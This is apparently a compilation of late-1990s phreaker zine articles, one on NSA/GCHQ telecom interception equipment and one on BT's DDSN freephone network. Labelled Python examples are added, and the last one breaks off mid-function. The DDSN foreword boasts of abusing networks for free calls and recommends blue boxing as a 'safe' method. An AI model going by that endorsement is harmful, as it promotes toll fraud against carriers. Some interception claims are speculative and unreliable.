To maximise the frequency spectrum available over trunk cables and international links, the subscriber's base band voice signals covering from 300 to 3400 Hz are translated using a sideband (SSB) modulation to a higher frequency range suitable for propagation over coaxial cables and radio links. 12 basic channels are modulated on to carriers in the range 64 to 108 kHz and spaced 4 kHz apart. When the lower sideband (LSB) is selected, these form a 'group' with a bandwidth of 48 kHz, extending from 60 to 108 kHz. Five groups are then modulated in a similar manner onto carriers spaced at 48 kHz intervals from 420 to 612 kHz to form a 'supergroup'. 16 supergroups are then LSB-SSB modulated onto carriers spaced by 248 kHz from 1116 kHz upwards. This results in a band of frequencies from 564 kHz upwards. To utilise the range below 564 kHz, a supergroup is modulated on to a 612 kHz carrier which after selection of LSB is reduced to a band between 60 and 300 kHz. The band between 300 and 564 kHz is filled with another supergroup in basic form (312 to 552 kHz). This hierarchy, referred to as 'master' or 'hypergroup', provides a multiplex (including frequency gaps or guardbands to cater for the characteristics of practical filters), with an upper frequency of close to 4 MHz which is easily carried over a coax cable.
--------------------------------------------------------------------------end-

Analogue communications are now more or less obsolete as literally all international telecommunications protocols and developments turn digital. Digital telecoms are based on a method called TDM (Time Division Multiplexing); this allows multi-channel communications to take place.
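The FDM hierarchy quoted above can be checked numerically. The following is an added example (not part of the 9x file or this article) that maps every voice channel through the three lower-sideband stages; it assumes the 16 supergroups are the one on the 612 kHz carrier, the one left in basic form, and 14 on carriers from 1116 kHz upwards, which is the reading that puts the top of the multiplex just above 4 MHz as the text says.

```python
"""FDM frequency plan for the group/supergroup/hypergroup hierarchy.

All values are in Hz and kept as integers so no rounding is involved.
"""

VOICE = (300, 3400)     # subscriber baseband given in the text
SLOT = (0, 4000)        # nominal 4 kHz slot, guard space included

CHANNEL_CARRIERS = [64_000 + 4_000 * i for i in range(12)]     # 64..108 kHz
GROUP_CARRIERS = [420_000 + 48_000 * i for i in range(5)]      # 420..612 kHz
# ASSUMPTION (see lead-in): index 0 is the supergroup on the 612 kHz carrier,
# index 1 the basic supergroup sent untranslated (None), then 14 carriers
# spaced 248 kHz from 1116 kHz upwards, 16 supergroups in total.
SUPERGROUP_CARRIERS = [612_000, None] + [1_116_000 + 248_000 * i for i in range(14)]


def lsb(carrier, band):
    """Lower sideband: the band is mirrored just below the carrier."""
    lo, hi = band
    return (carrier - hi, carrier - lo)


def channel_band(sg, grp, ch, band=VOICE):
    """Line-frequency band occupied by channel `ch` of group `grp` of supergroup `sg`."""
    band = lsb(CHANNEL_CARRIERS[ch], band)      # into the 60-108 kHz group
    band = lsb(GROUP_CARRIERS[grp], band)       # into the 312-552 kHz supergroup
    carrier = SUPERGROUP_CARRIERS[sg]
    return band if carrier is None else lsb(carrier, band)


def tone_on_line(sg, grp, ch, audio_hz):
    """Where a single audio tone ends up on the line."""
    return channel_band(sg, grp, ch, (audio_hz, audio_hz))[0]


def is_inverted(sg):
    """True when higher audio frequencies land lower on the line (odd number of LSB stages)."""
    return tone_on_line(sg, 0, 0, 3400) < tone_on_line(sg, 0, 0, 300)


def all_channels():
    for sg in range(len(SUPERGROUP_CARRIERS)):
        for grp in range(len(GROUP_CARRIERS)):
            for ch in range(len(CHANNEL_CARRIERS)):
                yield sg, grp, ch


def hypergroup_extent():
    """Lowest and highest line frequency of the whole multiplex (nominal slots)."""
    bands = [channel_band(sg, grp, ch, SLOT) for sg, grp, ch in all_channels()]
    return (min(lo for lo, _ in bands), max(hi for _, hi in bands))


def locate(line_hz):
    """Reverse lookup: which channel carries this line frequency, or None for a guard band."""
    for sg, grp, ch in all_channels():
        lo, hi = channel_band(sg, grp, ch)
        if lo <= line_hz <= hi:
            return (sg, grp, ch)
    return None


if __name__ == "__main__":
    print("channels:", sum(1 for _ in all_channels()))
    print("extent (Hz):", hypergroup_extent())
    print("basic supergroup, group 0, channel 0:", channel_band(1, 0, 0))
    print("558 kHz belongs to:", locate(558_000))
```

The reverse lookup shows why the guard bands matter: a frequency between 552 and 564 kHz maps to no channel at all, and channels in translated supergroups arrive spectrum-inverted relative to the basic one.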
The individual conversational channels are first digitised. Information concerning each channel is then transmitted sequentially rather than simultaneously, with each link occupying successive time slots. Bell implement T1 links as part of the major routing backbones on the US PSTN, which handle 24 phone channels at 1.544 Mbps. European countries, such as the UK, operate on slightly higher transmission speeds as part of the backbone. Instead of T-1 technology, European telco providers have implemented a different protocol called E-1, which carries 30 phone channels at 2 Mbps. Most COMINT telecommunications interception equipment is designed to intercept the European transmission protocols. New digital telephony techniques are emerging all the time, so Comint agencies spend a lot of time and money investigating each new transmission technique. One of the latest developments is the implementation of the SONET network, which uses synchronised signals which are carried by high capacity optical fibres, and are supposedly easily extractable by Comint agencies when high capacity links are involved.

b) Covert Telecommunications Interception Equipment

The NSA contract many organisations to develop and produce sophisticated Comint and Sigint interception equipment. Such entities include Space Systems, Lockheed, TRW, Raytheon and Bendix. The two major contracted NSA developers include AST (Applied Signal Technology) and IDEAS corp, where the directors are ex NSA employees. Out of all these NSA contracted developers, AST seems to be the most conspicuous, and describes its equipment as "TEMPEST screened". Such an organisation was described as "the one stop ECHELON shop".

Extraction of Wideband Signals and Data Analysis
================================================

Where wideband/broadband signal interception is concerned, they are usually intercepted from satellite relays and tapped digital multiplexed cables.
One such method used by COMINT agencies is called "wideband extraction", and involves utilising specialised Sigint equipment manufactured by the NSA contracted companies. Interception applications available to COMINT agencies are as follows:

(transponder survey equipment)

o satellite downlink interception
o demodulators
o decoders
o demultiplexers
o microwave radio link analysers
o link survey units
o carrier analysis systems

Satellite data link interception is analysed with AST equipment (AST model 196 transponder characterisation system) where the basic structure of the signal is broken down and analysed. The AST model 195 "the SNAPPER" is a wideband snapshot analyser and captures data from extensively high capacity systems for extraction. A newly developed system is the AST model 990, "Flexible Data Acquisition Unit", which is designed to record and analyse data from 2.488 Gbps SONET OC-48 telecommunications backbones; this device is fitted with 48 Gigs of memory and is capable of intercepting every packet of data from multiple internet exchanges. The data that is intercepted is then stored on RAID HD networks and then later analysed by an AST SONET 257E analyser. There are many steps and procedures that Comint agencies follow when intercepting such data. First, obviously the data is intercepted at links, channels and exchanges, then the captured data is broken down into parts so that multi channel processors can extract then filter the contained messages such as voice channels, fax communication, and modem data.

" The AST Model 120 multi-channel processor - used by NSA in different configurations known as STARQUAKE, COBRA and COPPERHEAD - can handle 1,000 simultaneous voice channels and automatically extract fax, data and voice traffic. Model 128, larger still, can process 16 European E-3 channels (a data rate of 500 Mbps) and extract 480 channels of interest.
The 1999 giant of AST's range, the Model 132 "Voice Channel Demultiplexer", can scan up to 56,700 communications channels, extracting more than 3,000 voice channels of interest. AST also provides Sigint equipment to intercept low capacity VSAT satellite services used by smaller businesses and domestic users. These systems can be intercepted by the AST Model 285 SCPS processor, which identifies and extracts up to 48 channels of interest, distinguished between voice, fax and data. "

Covert Data Processing, Fax Transmission Analysis
=================================================

After the actual transmission interception has taken place, the extracted data is then analysed by sophisticated AST developed software with "user friendly" equipment. AST have developed specialised covert operations data filtering and extraction software called ELVIRA which operates on given specifications such as STRUM. The software analyses the data and informs the user of phone call destinations and other signal related information. The information is then sent back to a remote NSA location in the form of CSDF (Collected Signals Data Format). Included in this file is a screenshot of a special software platform designed by AST called TRAILMAPPER which can operate at speeds of up to 2.5 Gbps, and is designed to be very versatile, in the sense that it can intercept any type of telecommunications medium (especially optical protocols). The trailmapper software is especially suited to extracting and analysing data from the new ATM (Asynchronous Transfer Mode) networks, which are becoming increasingly popular through implementation by IXCs such as AT&T. AT&T operate a special ATM network which spans the US, as well as another ATM network which is backboned via European locations. COMINT agencies are especially interested in ATM networks because telco providers offer ATM networking for VPNs, LANs and international WANs.
AST also offer very specialised equipment and software which is designed to intercept data from devices used to connect to networks and the internet. When a telecommunications link is intercepted, a transmission from an individual using a modem to connect to a network or the internet is easily extracted and then later analysed. As well as modem interception, FAX transmissions are also of intelligence interest. A fax transmission can be intercepted at any point during its journey over a PSTN, and then later analysed (or analysed in real time) by AST software such as the Fax Image Workstation, which implements OCR (Optical Character Recognition). And if you think that's scary.. AST also produce a system called "Pager Identification and Message Extraction" system which automatically collects and processes data from commercial paging systems. The NSA contracted collective "IDEAS" also produce specialised covert equipment like the VTP (Video Teleconferencing Processor) which has the ability to intercept and record multiple simultaneous video, and/or teleconference calls.

Multi Protocol Traffic Analysis Techniques
=========================================

Covert agencies participate in the art of traffic analysis, where information from telephone calls is processed and then later studied, depending on the area of "interest". For example, in such activities, information about the subject's line is always transmitted when placing a call, such as the CLID and the origin of the call via SS7 protocols. Even if voice encryption is used, the intercepted voice channel still reveals important, and potentially sensitive, data about the call type:

o CLID
o duration of call
o OPC codes
o destination of call
o frequency of call setups

Text locators: Applications have been built that are designed to intercept and sift through large arrays and quantities of data and information.
Such applications are essential to the effective operation of systems such as ECHELON, as the ECHELON system uses dictionary based applications to filter important or unimportant data. Such systems can be ported to act as robots on most communication protocols, such as IP or voice traffic. Data that has been intercepted is stored on massive databases for later retrieval, so a covert agency could implement topic analysis technology to search an internal database for keywords, ie: "counter attack" or "kill the president". The NSA currently use a filtering method known as "N-gram" which is designed to sort through a textual database for any topic, regardless of language.

"To use N-gram analysis, the operator ignores keywords and defines the enquiry by providing the system with selected written documents concerning the topic of interest. The system determines what the topic is from the seed group of documents, and then calculates the probability that other documents cover the same topic. In 1994, NSA made its N-gram system available for commercial exploitation. NSA's research group claimed that it could be used on "very large data sets (millions of documents)", could be quickly implemented on any computer system and that it could operate effectively "in text containing a great many errors (typically 10-15% of all characters)". The "Data Workstation" Comint software system analyses up to 10,000 recorded messages, identifying Internet traffic, e-mail messages and attachments.

Speech Recognition and Voice Interception
=========================================

The UK's GCHQ combined with the US's NSA all conduct research into speech recognition techniques. Rumours that such technology is used to "pick up" on certain keywords in telephone speech cannot be classified as concrete fact, because obviously such organisations would deny this type of communications monitoring.
However, if such a system is deployed by these agencies, they would be able to gather a higher degree of intelligence information, rather than picking on areas of suspicion. If software is available to the public that allows a PC user to talk to a computer, then have the computer dictate what the person is saying into text format, just imagine what the COMINT agencies have..

Advanced Speech Recognition, Real CallerID
==========================================

GCHQ and the NSA currently have TE464375-1 VADA (Voice Activity Detector and Analyser) equipment installed inside a GCHQ base in Cheltenham, England. Advanced speech recognition systems can be produced to operate on a mass scale basis, whereby a subject's voice patterns can be programmed into such a device, which will then hunt that particular voice pattern down on a given set of telephone channels. System descriptions must be classified "secret" if NSA "determines that they represent major advances over techniques known in the research community".

8. Closing, Summarisation

This article only covers a very limited set of covert communications interception techniques; there are many more out there. The COMINT and SIGINT organisations are very resourceful, in the sense that they have vast funds to back up research into covert communications devices. The idea that technology exists that can distinguish voice patterns over telephone channels is particularly scary, and in a sense, a complete infringement of the "private" service that the telco providers offer. The fact is, such technologies do exist, and can be (or have been) implemented. Telecommunications equipment is intended for the interception of "hotspot" information such as military and diplomatic communications; it is however strange that such systems are designed to be attached to major telecommunications backbones (Optically Derived) to "filter" the important information.
It's a case of whether or not you "trust" the NSA or GCHQ or whatever to only intercept real intelligence information, or whether they'll adopt the "big brother" approach and monitor ALL communications. Either way, they are unlikely to admit to any such activities; the fact is, they have the technology and the ability to monitor all major communications protocols.. Do you trust them? Do they trust you? It's all in the name of "National Security"...

Well, that's it for this file, I hope you enjoyed it.

Werd/Shouts to: D4RKCYDE, 9x, b4b0, kelticphr0st, jasun, zomba, bodie, gr1p, shadowx, lowtek, psyclone, shylock, digiphreq, downtime, elaich, oxidation, substance, tip, pbxphreak, lusta & nou, force, microwire, oclet, knight, siezer, devious.

------------------------------------------------------------------------------
B L 4 C K M 1 L K teleph0nics
FUCKIN HARDCORE, BABY
http://hybrid.dtmf.org/
------------------------------------------------------------------------------

Type Bits/KeyID    Date       User ID
pub  2048/86298E99 1999/09/18 hybrid

.
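The N-gram passage quoted in the text-locator section above describes seeding a filter with sample documents instead of keywords, and working on text with 10-15% character errors. The following is an added example, not NSA's system and not code from this article: it assumes character trigram profiles compared by cosine similarity (the article does not describe the algorithm's internals), and all documents in it are constructed.

```python
"""Seed-document topic ranking with character n-grams versus keyword matching."""
import math
import re
from collections import Counter

N = 3  # n-gram length in characters (assumed; the article gives none)

# Constructed seed documents that define the topic of interest.
SEEDS = [
    "freephone calls are routed by the network database over signalling links",
    "switching nodes query the network database for freephone call routing",
    "signalling links connect switching nodes to the network database",
]

# Constructed candidates: an on-topic text, the same text with roughly 12%
# of its characters damaged (OCR or line-noise style), and an unrelated text.
CANDIDATES = {
    "clean": "the network database tells switching nodes how to route freephone calls",
    "noisy": "the netw0rk datab4se te1ls swiching n0des how to r0ute freephnoe ca1ls",
    "offtopic": "boil two eggs, add salt, pepper, mustard; chill, serve cold",
}

KEYWORDS = ("network", "database", "freephone")


def ngram_profile(text, n=N):
    """Count overlapping character n-grams of the lower-cased, space-normalised text."""
    norm = " " + " ".join(re.findall(r"[a-z0-9]+", text.lower())) + " "
    return Counter(norm[i:i + n] for i in range(len(norm) - n + 1))


def cosine(a, b):
    """Cosine similarity of two n-gram count vectors (0.0 when either is empty)."""
    dot = sum(count * b[gram] for gram, count in a.items())
    size = math.sqrt(sum(c * c for c in a.values())) * math.sqrt(sum(c * c for c in b.values()))
    return dot / size if size else 0.0


def topic_model(seed_docs):
    """The topic is the summed n-gram profile of the seed documents."""
    total = Counter()
    for doc in seed_docs:
        total.update(ngram_profile(doc))
    return total


def rank(seed_docs, candidates):
    """Return (score, name) pairs, most similar to the seed topic first."""
    topic = topic_model(seed_docs)
    scored = [(cosine(ngram_profile(text), topic), name) for name, text in candidates.items()]
    return sorted(scored, reverse=True)


def keyword_hits(text, keywords=KEYWORDS):
    """Exact keyword matching, the dictionary approach, for comparison."""
    lowered = text.lower()
    return sum(1 for word in keywords if word in lowered)


if __name__ == "__main__":
    for score, name in rank(SEEDS, CANDIDATES):
        print(f"{name:9s} similarity={score:.3f} keyword_hits={keyword_hits(CANDIDATES[name])}")
```

The damaged text matches none of the keywords yet still ranks well above the unrelated one, because most of its trigrams survive the errors.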
: |
+-+[ DDSN intelligent network ]+---> by kelticphrost <-----------------------+
+-+[ D4RKCYDE ]+---> <-----------------------+
| : .

_\|/_ [ GBH ] Ghwan Burnin Haxorz [ GBH ] _\|/_

///////////////////////////////////////////////////////////////////////////
//                                                                       //
//                       DDSN Intelligent Network                        //
//                                                                       //
//   A full rundown of our LinkLine (0800) and LoCall (0345) Services    //
//                                                                       //
//                  Presented in full By Keltic Phr0st                   //
//                                                                       //
///////////////////////////////////////////////////////////////////////////

"...the most sophisticated network of its type outside North America."
Steve Webster, BT ; DDSN Development Team

FOREWORD
========

This article shook me up very badly after reading it. At the time I'd been working extensively on a Unix Box in 896, and abusing the fuck out of P****** for global calls in 892. Not only this, but a host of other activities, which are probably nestling on some AMA tape somewhere, waiting to be looked at... . It's not all doom and gloom though - AMA has yet to pinpoint Blue Boxing for some reason, and in so far this would seem to be the only real 'safe' method of putting your calls away for free alongside cellular, I recommend you start to view it in a new light. Anyway, after that suitably apocalyptic snippet, here we go.

///// ///// ///// ///// ///// ///// ///// ///// ///// /////

INTRODUCTION
============

In 1983, British Telecom identified a major market potential for automatic freephone and premium rate services. An Analogue Network, with extended register translation and call charging facilities overlaid on the PSTN, was proposed as an interim solution. The analogue derived services network, consisting of eight fully-interconnected switching nodes, was brought into limited public service in April 1985 and full public service in July 1985. The LinkLine 0800 service permits calling customers to make calls free of charge while callers to LinkLine 0345 service numbers are charged at the local call rate irrespective of distance.
The balance of the call charge is billed to the called customer, known as the Service Provider (SP). In keeping with its business modernisation programmes, British Telecom awarded a contract to AT&T for the supply and installation of a digital derived services network (DDSN), comprising 5ESS-PRX digital switches to be implemented in two distinct phases:

Phase 1, which was completed in 1988, involved the supply of eight digital units, utilising CCITT No. 7 common-channel signalling, as replacements for their analogue units (Figure 1). In addition, two new digital units were provided in London.

Figure 1 : Digital Derived Services Network Interconnection

[diagram not reproduced; elements shown: DLE, DMSU, DDSSC and SP within the DIGITAL DERIVED SERVICES NETWORK, AMSU and ALE in the EXISTING PUBLIC SWITCHED TELEPHONE NETWORK; only 4 centres shown for clarity]

AMSU   Analogue Main Switching Unit
ALE    Analogue Local Exchange
DDSSC  Digital Derived Services Switching Centre
DLE    Digital Local Exchange
DMSU   Digital Main Switching Unit
SP     Service Provider

Phase 2 makes provision for an advanced freephone service using an intelligent network architecture.
INTELLIGENT NETWORK CONCEPT
===========================

In a traditional telecommunications network, call control 'intelligence' resides in the call processing software in its switching nodes. One disadvantage of this approach for some services is that customer-specific data has to be replicated in each node. As features become more sophisticated, system complexity increases. In the DDSN Intelligent Network, specialised customer feature and routing information is held centrally in a network database which can be accessed by all switching nodes using dedicated datalinks and common-channel signalling (Figure 2). These signalling datalinks are used to pass requests for call handling information to the database and return instructions to the originating switching node.

Figure 2 : Network DataBase Concept

[diagram not reproduced; elements shown: NETWORK DATABASE with ACCESS TO/FROM ALL DDSN SWITCHES, four DDSN SWITCH blocks linked by SPEECH AND SIGNALLING]

An Intelligent Network centralised call management function allows an economical implementation of advanced features, simplifies administration of complex services and assures optimum use of network-wide, rather than switch-based, resources.

DDSN INTELLIGENT NETWORK ARCHITECTURE
=====================================

Three network elements are concerned with call processing for service providers with advanced features:

o Action Control Point (ACP)
o Network Control Point (NCP)
o Network Services Complex (NSC)

The network architecture is illustrated in Figure 3, and the role of each of the elements will become apparent as the call processing aspects are explained.
Figure 3 : DDSN Intelligent Network Architecture

[diagram not reproduced; elements shown: NSC blocks, ACP/STEP/HOST, ACP / STEP, ACP and ACP / HOST nodes joined by C7NA links, C7BT links and VOICE TRUNKS, with C7BT and voice trunk connections to the PSTN]

-T-T-T- = VOICE TRUNKS

ACP   ACTION CONTROL POINT
STEP  SIGNAL TRANSFER AND END POINT
C7BT  CCITT #7 SIGNALLING (BT)
NCP   NETWORK CONTROL POINT
NSC   NETWORK SERVICES COMPLEX
C7NA  C7 NORTH AMERICAN

(Only four switching nodes are shown for simplicity)

Action Control Point
--------------------

The Action Control Points (ACPs) are the 5ESS-PRX Switching Nodes, which serve as transit and terminating nodes for DDSN traffic. All ACPs are fully interconnected by digital line systems and CCITT #7 (BT) common channel signalling. The CCITT #7 (BT) signalling links are used exclusively for setting up speech paths both within the DDSN and between the DDSN and the PSTN.
A second, totally independent common channel signalling network, utilising a proprietary form of #7 signalling (C7 North American), is used for transporting non-circuit related signalling methods between the ACPs and the Network Control Points (NCPs). This network is used only for advanced feature calls.

Two of the ACPs have been nominated as a signal transfer and end point (STEP) and funnel the signalling traffic from the remaining ACPs to the NCPs. ACPs load share the C7NA signalling messages across both STEPs in the ACP-to-NCP direction, and the NCPs load share the signalling messages across both STEPs in the reverse direction.

Network Control Point
---------------------

The Network Control Point (NCP) constitutes the core of the intelligent network and holds the data defining the treatment for specific advanced feature calls. NCPs are always provided in mated pairs.

Each NCP consists of a duplex processor, duplicated hard discs for data storage, tape drives and interfaces to the other network elements through a Local Area Network. This network, called the Common Network Interface, consists of the signalling terminals for the C7NA links from the STEP nodes and two peripheral controllers which communicate with the duplex processor. The common network interface ring (Figure 4) is automatically reconfigured under fault conditions to isolate the faulty section.
[Figure 4 : Common Network Interface Ring. Diagram not recoverable. Labels: ACP/STEP (two), C7NA SIGNALLING LINKS, LN (four), RPCN (two), CENTRAL PROCESSOR, RING 0, RING 1.]

 LN      LINK NODE
 RPCN    RING PERIPHERAL CONTROLLER NODE

Advanced freephone call handling data is duplicated both within and between each NCP in the mated pair. Call routing queries from the ACPs are balanced between the two NCPs by designating specific dialled codes to each NCP, and the decision on which NCP to query is taken at the ACP where the call entered the DDSN network. Although data is held on both NCPs, the secondary NCP is only accessed if the primary is not available. Under these conditions, the remaining NCP is capable of handling 100% of the load. This architecture virtually guarantees 100% service availability.

Automatic network management controls initiated by the NCP maintain the integrity of the intelligent network under overload conditions by sending code gapping messages instructing the ACPs to throttle back on the number of queries being forwarded to the NCP and defining the treatment for failed calls.

Network Services Complex
------------------------

The Network Services Complex (NSC) provides the capability to give callers standard or customised interactive spoken information pertaining to the number called, such as call prompting, courtesy response and call queuing announcements.
During or after a call prompting announcement the caller may communicate with the NSC by keying-in appropriate digits on an MF keyphone or keypad. The NSC can collect up to 15 digits which it forwards, via its host ACP, to the NCP via a C7NA common channel signalling link.

Initially, two NSCs loaded with the same announcements have been provided in the DDSN intelligent network and are co-located with the NCPs. Each NSC can handle 60 simultaneous calls and provide up to 2000 different announcements which are stored on triplicated moving head discs. In the event of an NSC failure, calls requiring these features are routed to the remaining NSC. The NSC architecture is given in Figure 5.

[Figure 5 : Network Services Complex Architecture. Diagram not recoverable. Labels: ACP / HOST, voice trunks and C7NA to the NSC, TIME-SLOT INTERCHANGE, SIGNALLING LINK TERMINAL, PROCESSOR, DATA STORAGE UNITS, DISCS, TONE RECEIVER UNITS.]

ADVANCED FEATURES
=================

The DDSN Intelligent Network will permit a range of new features to be offered as Advanced LinkLine to LinkLine service providers. These include (Advanced LinkLine feature name is in brackets) :

 o Time and Day Routing - The routing of calls can be made dependent on the time of day, day of week and week of the year. (TimeLink / DayLink)

 o Call Allocator - This provides the capability to route incoming calls proportionally to a number of service provider destinations and / or announcements. (DistributionLink)

 o Call Queuing - This provides queues for calls at the originating ACP when all available lines to a service provider destination are engaged. An announcement informs the caller of the call status. (QueueLink)

 o Call Barring - This feature allows service providers to define the treatment of a particular Advanced LinkLine number based on where the call originated in the PSTN. (AreaLink)

 o Alternative Destination on Busy - When a busy condition is encountered and no queuing is defined, an alternative destination may be chosen automatically. (BusyLink)

 o Call Prompter - Announcements will prompt callers to enter digits on their telephone set in order to realise caller interactive routing. (SelectLink)

 o Courtesy Response - If no destination can be reached, for example, due to an unattended office, a pre-defined standard or customised announcement may be played. (CourtesyLink)

 o Command Routing - This feature allows the service provider to instruct British Telecom to redirect calls to a preset alternate set of destinations. This is intended for emergency and other contingency situations. (CommandLink)

CALL ROUTING PLANS
==================

The true power of intelligent network call processing is not solely its list of advanced features, but combinations of the feature set which can be defined to meet a service provider's own unique telecommunications needs and, consequently, business requirements. An example of a simple call routing plan is shown in Figure 6. The data defining the call treatment(s) for a service provider are held in the NCP database in a service provider record.

[Figure 6 : Combining service features. Diagram of a call routing plan: DAYLINK ("WHAT DAY?") passes MON - FRI calls to AREALINK ("WHAT AREA?") and SATURDAY AND SUNDAY calls to a COURTESYLINK announcement ("ALL OFFICES ARE CLOSED FOR THE WEEKEND..."). AREALINK passes LONDON calls to SELECTLINK and ALL OTHER calls to the BRISTOL BRANCH. SELECTLINK plays "KEY 1 FOR COMMERCIAL LOANS, KEY 2 FOR CONSUMER LOANS..." and routes on "WHAT MF DIGIT?": DIAL PULSE / NO RESPONSE to OPERATOR, DIGIT #1 to COMMERCIAL LOANS, DIGIT #2 to CONSUMER LOANS, DIGIT #3 to OTHER.]

SERVICE ADMINISTRATION
======================

Service Administration for Advanced LinkLine features is handled by the network subscriber transaction, administration and recording system (NETSTAR), which has on-line access to the NCPs. NETSTAR provides user friendly access to the NCP advanced feature database to modify, create or delete service provider call routing plans via dedicated or dialup/dialback links to VDUs. An NCP can have only one active call routing plan for any service provider number, but additional plans may be prepared and held in NETSTAR for transmission to, and activation at, the NCP when required. NETSTAR holds security backup copies of all call routing plans and NCP operating parameters.

CALL PROCESSING
===============

Derivation of the Calling Subscriber Geography (CSG)
----------------------------------------------------

All 0800 and 0345 calls are routed via a DMSU to a DDSN action control point (ACP) (Figure 7). During call set-up, the ACP requests additional set-up information to be sent via the C7BT Link. This causes the calling line identity (CLI) to be forwarded from the first exchange in the call path with C7BT signalling.
[Figure 7 : Access to the Digital Derived Services Network. Diagram: on the PSTN side, a DLE or E-ALE, and an AMSU/+ALE, connect to a DMSU; on the DDSN side, the DMSU connects to a 5ESS-PRX (ACP), which connects to a second 5ESS-PRX (ACP); each ACP serves an SP. The links between exchanges are C7BT signalling and voice trunks.]

 * ALE may be via a digital concentrator centre exchange
 E-ALE : Enhanced analogue Local Exchange (C7BT signalling capability)

If a call is originated from a local exchange with C7BT signalling, a full calling line identity (FCLI) is returned to the ACP. The FCLI includes the caller's national number group (NNG) code, or all figure numbering (AFN) code in the case of a director area.

If the call is originated from an analogue local exchange (ALE), then a partial calling line identity (PCLI) is derived by the first digital exchange in the call path. This will normally be a DMSU, but in cases where an ALE is parented on a digital concentrator centre exchange (DCCE), the DCCE generates the PCLI. A PCLI must comprise sufficient information to uniquely identify the digital entry point to the PSTN used by that ALE. This information includes the region, area and unit identity portions of the network nodal identity plus the telephony process number and route numbers used by the call processing software of the digital exchange.

When a PCLI or FCLI is received by a DDSN action control point, the call processing software searches through a set of look-up tables for a comparison with the CLI sent. This search will result in the calling subscriber geography (CSG) being identified. Figures 8 and 9 illustrate the CLI and CSG derivation process.
[Figure 8 : CLI derivation. Diagram: the 5ESS-PRX (ACP) sends REQUEST CLI back to the DMSU, which passes it on to the DLE / E-ALE; for a call from an ALE the request stops at the DMSU.]

[Figure 9 : CSG derivation. Diagram: the FCLI from a DLE, or the PCLI produced for a call from an ALE, is forwarded through the DMSU to the 5ESS-PRX (ACP), where the CLI/CSG TABLES give the CSG.]

Global Title Translation
------------------------

Call processing for service providers with basic features is handled within the DDSN switching nodes. To differentiate between calls to SPs with advanced and basic features, the ACP checks for the existence of a translation for the number dialled. If a translation exists, the call is routed to the specified network termination. If the translation does not exist, call handling instructions are returned from the NCP database in response to a query message from the originating ACP. A number of query messages are necessary for some types of call; the initial query is therefore termed QRY1. The process is illustrated in Figures 10 and 11.
Figure 10 : DDSN Intelligent Network call Processing (Call not requiring NSC and no network controls active)

[Flowchart; box text recovered from the original diagram. GTT : GLOBAL TITLE TRANSLATION]

 1. INCOMING CALL FROM PSTN. DIGITS RECEIVED AT ORIGINATING ACP: (0)800 345800 ( OR (0) 345 DEFGHJ )
 2. ACP REQUESTS ADDITIONAL SET-UP INFO VIA C7BT LINK ( SEE FIGURE 8 )
 3. FCLI OR PCLI FORWARDED TO ACP ( SEE FIGURE 8 )
 4. TRANSLATION HELD AT ACP?
      YES -> ORIGINATING ACP DEALS. CALL SETUP NORMALLY USING C7BT LINK
      NO  -> step 5
 5. IS 0800-345 DEFINED IN GTT?
      YES -> SEND QRY1 MESSAGE TO NCP VIA C7NA LINK, then step 6
      NO  -> 'VACANT CODE' NUMBER UNOBTAINABLE TONE RETURNED
 6. IS A PLAN HELD AT NCP FOR 800 345800?
      NO  -> SEND A FINAL TREATMENT OF 'VACANT CODE' TO ACP, then 'VACANT CODE' NUMBER UNOBTAINABLE TONE RETURNED
      YES -> NCP DETERMINES CALL TREATMENT. BILLING AND ROUTING DETAILS TO ACP VIA C7NA, then ORIGINATING NCP SETS UP CALL USING C7BT LINK

[Figure 11 : ACP Communication with NCP. Diagram: ACP 1 (TRANSLATION NOT HELD, 0800 DEF IN GTT) sends QRY1 TO NCP over C7NA, through ACP 2, to the NCP processor holding the SP RECORD. BILLING INSTRUCTIONS + ROUTE MESSAGE OR FINAL TREATMENT return over C7NA by the same path. ACP 1 then uses C7BT to reach ACP n (CALL SET-UP COMPLETED TO SERVICE PROVIDER), which connects to the SP.]

 ACP 1 = ACP receiving call from PSTN
 ACP 2 = ACP with directly connected NCP
 ACP n = The ACP on which the SP is terminated

The QRY1 message includes:

 a) 10 digit dialled number, which excludes any leading 0 but includes a trailing 0 as padding if only 9 digits long.
 b) Calling subscriber geography (CSG).
 c) The ACP which originated the query. This is used to reference a table in the NCP which defines the capabilities of the ACP; for example, whether it has an NSC.
 d) The destination of the query.

The route message includes a network code of up to 10 digits which is used by the ACP to route the call to its destination. This is normally a service provider (SP) line, but can be an NSC announcement.

A final treatment command is sent to the ACP when the NCP cannot route a call normally. The final treatment command results in either a tone or an announcement being returned to the caller.
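The query flow above as a runnable sketch. This is an added example, not code from the article or from any BT or vendor system: it models QRY1 item (a), the translation and GTT checks at the ACP, primary/secondary NCP selection, and a routing plan shaped like Figure 6. The class names, network codes, CLI prefixes, the 6-digit GTT key and the treatment used when both NCPs are down are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime
from typing import Optional

# Constructed network codes and CLI prefixes; none of these values are from the article.
CODES = {"operator": "7000", "commercial": "7001", "consumer": "7002",
         "other": "7003", "bristol": "7100", "closed_announcement": "7900"}
CSG_TABLE = {"0171": "LONDON", "0181": "LONDON", "0117": "BRISTOL"}


def normalise_dialled(number: str) -> str:
    """QRY1 item (a): drop the leading 0, pad a 9 digit number with a trailing 0."""
    digits = "".join(ch for ch in number if ch.isdigit())
    if digits.startswith("0"):
        digits = digits[1:]
    if len(digits) == 9:
        digits += "0"
    if len(digits) != 10:
        raise ValueError(f"cannot form a 10 digit dialled number from {number!r}")
    return digits


@dataclass(frozen=True)
class Qry1:
    dialled: str       # (a) 10 digit dialled number
    csg: str           # (b) calling subscriber geography
    origin_acp: str    # (c) ACP which originated the query
    destination: str   # (d) destination of the query


@dataclass(frozen=True)
class Reply:
    kind: str          # "ROUTE" (network code follows) or "FINAL" (tone/announcement)
    value: str
    source: str        # which network element made the decision


def loans_plan(q: Qry1, when: datetime, digit: Optional[str]):
    """Figure 6 as code: DayLink, then AreaLink, then SelectLink."""
    if when.weekday() >= 5:                    # Saturday and Sunday: CourtesyLink
        return "ROUTE", CODES["closed_announcement"]
    if q.csg != "LONDON":                      # AreaLink: all other areas
        return "ROUTE", CODES["bristol"]
    by_digit = {"1": "commercial", "2": "consumer", "3": "other"}
    # Dial pulse / no response goes to the operator; so do unlisted digits (assumption).
    return "ROUTE", CODES[by_digit.get(digit, "operator")]


class NCP:
    def __init__(self, name, plans):
        self.name, self.plans, self.available = name, plans, True

    def query(self, q: Qry1, when: datetime, digit: Optional[str]) -> Reply:
        plan = self.plans.get(q.dialled)
        if plan is None:                       # no plan held for this number
            return Reply("FINAL", "VACANT CODE", self.name)
        kind, value = plan(q, when, digit)
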